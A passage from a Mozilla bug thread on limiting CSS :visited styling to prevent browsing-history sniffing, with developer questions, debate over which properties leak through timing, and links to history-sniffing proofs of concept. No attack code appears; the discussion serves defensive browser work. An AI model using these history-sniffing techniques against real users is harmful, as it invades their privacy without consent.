i mean that i cannot anymore access, in a both read or write fashion,to CSS properties such as the font-size in the usual manner document.getElementById['element'].style.fontSize. Do you have any idea why ?
Comment 269•14 years ago
|
||
Neither document.getElementsByTagName("a").style.color or document.getElementById['element'].style.color are accessible anymore. By debugging i can see their values are rendered to null by the browser. Was this expected to happen ?
Comment 270•14 years ago
|
||
(In reply to comment #269)
> Neither document.getElementsByTagName("a").style.color
A few things:
- note that you need a "[0]" in there -- getElementsByTagName() returns an array, not a single element.
- Your code just queries the "style" attribute (which is undefined because you probably haven't explicitly set it). That doesn't do (and never has done?) what you probably want. You probably want something like this instead, to get the *computed* style:
> window.getComputedStyle(document.getElementsByTagName("a")[0], "").getPropertyValue("color");
(I just verified that the above line works, in a trivial testcase, in my nightly build.)
Google for "getComputedStyle" to learn more.
Comment 271•14 years ago
|
||
Ah, I see from comment 266 that you already knew about getComputedStyle. Then I guess the lesson here for you is that "element.style" is simply an accessor for the style *attribute*, and it'll only contain useful data if you explicitly set the style attribute.
e.g. elem.style.fontSize and .color should both be accessible on this <a> element:
<a style="font-size: 30px; color: yellow">foobar</a>
That behavior has not recently changed.
If you have any further questions or concerns on this, please take them to a Mozilla newsgroup like mozilla.dev.platform* or to a support forum.
* http://www.mozilla.org/about/forums/#dev-platform
Comment 272•14 years ago
|
||
Thanks for the clarifications. I have now got it working. Best Regards
Comment 276•14 years ago
|
||
oh, why did you block the ability to set text-decoration, opacity and cursor for the visited links? they can't move any elements on the page, and the values for these properties, that get sent to the site - we may spoof them so the site won't know whether we had visited any links on that site before.
You already do so when you allow users to style visited links by changing colors, and you spoof the sent values. Why not do the same for other CSS properties that we also could spoof?
Please, give users back the ability to style visited links' text-decoration, opacity, cursor and the rest of css-properties that we could harmlessly spoof.
Comment 277•14 years ago
|
||
(In reply to comment #276)
> oh, why did you block the ability to set text-decoration, opacity and cursor
> for the visited links?
See http://dbaron.org/mozilla/visited-privacy , under "However, this isn't sufficient".
In particular -- cursor can load images, and opacity can affect perf in ways that the page could detect via timing attacks. text-decoration I'm less sure about, but I'm guessing it could affect layout or have subtle perf effects from e.g. gobs and gobs text with "blink" applied.
Comment 278•14 years ago
|
||
text-decoration can cause stuff to move by changing inter-line spacing to make room for underlines, and I recall dbaron saying that *any* change to the set of pixels that are painted can cause a measurable perf difference.
Comment 279•14 years ago
|
||
(In reply to comment #278)
> text-decoration can cause stuff to move by changing inter-line spacing to make
> room for underlines, and I recall dbaron saying that *any* change to the set of
> pixels that are painted can cause a measurable perf difference.
AFAIK that's not true.
Pixels affect nothing. perf difference can be caused only by changes in element's positioning, and text-decoration can affect it nohow.
Please, could you check that information?
Comment 280•14 years ago
|
||
What is the point of this when queries into global history could be done via other means. Surely someone could just do a timed attack on a cached page element, such as loading an image?
If the image was cached in a way that the server does not need to be queried, the image would load right away.
What is different between this and the visit: problem?
Is it just that a timed attack on a cached page element is just slower?
Eg: http://www.zdnet.co.uk/news/regulation/2000/12/12/cache-attack-timing-is-everything-2083140/
Comment 281•14 years ago
|
||
The point is that cache timing can get you maybe ~1k URL/min, whereas the JS/CSS method (after my improvements) can get .5-5M URL/min.
That is a HUGE qualitative difference.
http://github.com/saizai/cssfingerprint (I've taken the server down, FYI.)
http://saizai.livejournal.com/960791.html
Anything whatsoever that will cause a JS-detectable rendering change that can be attached to :visited or :link will allow me to do this attack.
I don't have the time now to work on this more, but you can fork my code above to test this text-decoration issue.
Comment 282•13 years ago
|
||
Oh my bleep.
My version: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24
Target version for the fix: mozilla1.9.3a4
I just found out about this. And no, "Run a newer version" isn't available for me. And this is almost 10 years old by now.
PLEASE, someone tell me that a security hole this large (I just found http://www.whattheinternetknowsaboutyou.com/top20k?noscript=3 from these comments -- ick) is going to be back patched.
ICK. Yes, I want to see visited links in a different color.
NO, I don't want web sites to be able to play with visited status -- I can just imagine online stores seeing what I'm buying from their competition and using that as advertisement tracking. Or worse.
<Sigh>. Safari doesn't run no script, has it's own problems, doesn't support a lot of plug-ins. TenFourFox has its own share of compatibility problems (but in fairness, with google dropping offline mail, the biggest is going away.) Etc.
Comment 283•13 years ago
|
||
michael, Firefox 3.6 is EOL (end of life), i.e. not even critical security holes will be fixed anymore. Yes, that's upsetting in your case of PowerPC Mac, but this bug is not the right forum for that question.
Comment 284•13 years ago
|
||
(In reply to Ben Bucksch (:BenB) from comment #283)
> michael, Firefox 3.6 is EOL (end of life), i.e. not even critical security
> holes will be fixed anymore. Yes, that's upsetting in your case of PowerPC
> Mac, but this bug is not the right forum for that question.
3.6 is not EOL. This fix is not going to be back-ported during the months that remain before it is EOL, though. (And please remember that every comment on this old, closed bug spams 140 people)
Comment 285•13 years ago
|
||
According to https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector
I could use
background-color
border-color (and its sub-properties)
outline-color.
I haven't gotten outline or background working, by using this:
a:visited {
background-color: lime;
outline: 4px solid lime;
}
I guess these are turned off now too? Color still seems to work.
So the devmo article needs to be updated?
Comment 286•13 years ago
|
||
(In reply to Martijn Wargers [:mw22] (QA - IRC nick: mw22) from comment #285)
> I haven't gotten outline or background working, by using this:
> a:visited {
> background-color: lime;
> outline: 4px solid lime;
At least for outline, I suspect you need to set "outline-width" unconditionally (not in a :visited selector) and only have "outline-color" be :visited.
Comment 287•13 years ago
|
||
All relevant outline properties except -color, in fact.
Have a look at http://jsfiddle.net/8XDwF/2/
Assignee | ||
Comment 288•13 years ago
|
||
And for background, you're not allowed to change the transparency, and the initial value is 'transparent'. You'd need something non-transparent outside of a :visited selector.
Comment 289•13 years ago
|
||
Is "background-position" blocked intentionally? If changing "background-color" is considered to be safe, then changing "background-position" should be safe as well.
This would be useful to reposition a CSS sprite image depending on the visited state. E.g. make the color of a decorative "arrow" image match the text color.
Assignee | ||
Comment 290•13 years ago
|
||
(In reply to Steffen Weber from comment #289)
> Is "background-position" blocked intentionally?
Yes, because it could lead to measurable speed differences.
Comment 291•13 years ago
|
||
To anyone in the future who wants to request that a specific CSS property be unblocked from use in :visited selectors: Please file a *new* bug depending on this one; don't comment here. Be prepared to argue not only for the utility of the property in :visited, but for its not exposing visitedness to the site that uses it -- even by minute changes in timing, or other "covert channels".
Comment 292•12 years ago
|
||
@Zack Weinberg
I filled separate bug about background-color as you suggest:
https://bugzilla.mozilla.org/show_bug.cgi?id=767173
:visited does not take "background-color" CSS in account (docs say opposite statement).
Comment 293•12 years ago
|
||
Comment on attachment 431539 [details] [diff] [review]
patch 14: make nsStyleContext::FindChildWithRules deal with the visited style context
>+ NS_ABORT_IF_FALSE(aRulesIfVisited || !aRelevantLinkVisited,
>+ "aRelevantLinkVisited should only be set when we have a separate style");
[This crashes if you put a (visited?) link into a document in a chrome docshell.]
Comment 294•12 years ago
|
||
re: comment 280 and timing attacks on cached page elements.
Looks like Michal Zalewski has done some more research in this area. He posted this to the Wasc list just now. It this worthwhile spinning off another bug?
As you probably know, most browser vendors have fixed the ability to
enumerate your browsing history through the CSS :visited
pseudo-selector. The fix severely constraints the styling possible for
visited links, and hides it from APIs such as
window.getComputedStyle() [1].
The fix does not prevent attackers from extracting similar information
through cache timing [2], or by examining onerror / onload events for
scripts and images loaded from sites to which you may be logged in.
Nevertheless, the :visited attack is particularly versatile and
reliable, so several people have tried to circumvent the fix by
showing the user a set of hyperlinked snippets of text that, depending
on the browsing history, will blend with the background or remain
visible on the screen. Their visibility can be then indirectly
measured by seeing how the user interacts with the page.
The problem with these attacks is that they are either unrealistic, or
extremely low-throughput. So, here is a slightly more interesting
entry for this contest. The PoC works in Chrome and Firefox, but
should be easily portable to other browsers:
http://lcamtuf.coredump.cx/yahh/
The basic idea behind this inferior clone of Asteroids is that we hurl
a lot of link-based "asteroids" toward your spaceship, but you only
see (and take down) the ones that correspond to the sites you have
visited. There are several tricks to maintain immersion, including
some proportion of "real" asteroids that the application is sure are
visible to you. The approach is easily scalable to hundreds or
thousands of URLs that can be tested very quickly, as discussed here:
http://lcamtuf.blogspot.com/2013/05/some-harmless-old-fashioned-fun-with-css.html
Captain Obvious signing off,
/mz
[1] https://developer.mozilla.org/en-US/docs/CSS/:visited
[2] http://lcamtuf.blogspot.com/2011/12/css-visited-may-be-bit-overrated.html
Comment 295•12 years ago
|
||
when I try the PoC at http://lcamtuf.coredump.cx/yahh/ I get pretty inconsistent and unreliable results. First few games the sites visited popup was never launched. then I visited cnn.com, and then played the game. the popup came up but cnn.com wasn't shown as a visited site. several others that I might had visited did show.
in the next game cnn.com did show on the list list of visited.
Comment 296•12 years ago
|
||
If you want to block those "low-bandwidth" attacks you can set layout.css.visited_links_enabled to false.
Comment 299•6 years ago
|
||
Hi,
I found this paper https://www.spinda.net/papers/smith-2018-revisited.pdf where the authors claim that the flag layout.css.visited_links_enabled sets to false does not work properly.
"Turning off Firefox’s layout.css.visited links enabled configuration flag should eliminate visited link styling
altogether [5, 46]. Not so: disabling the flag fails to block either our visited-link attacks or Paul Stone’s
older one; we reported this bug to Mozilla."
Is Mozilla conscious about this?
Thank you
Comment 300•6 years ago
|
||
(In reply to erotavlas from comment #299)
That was fixed in bug 1477773.
You need to log in
before you can comment on or make changes to this bug.
Description
•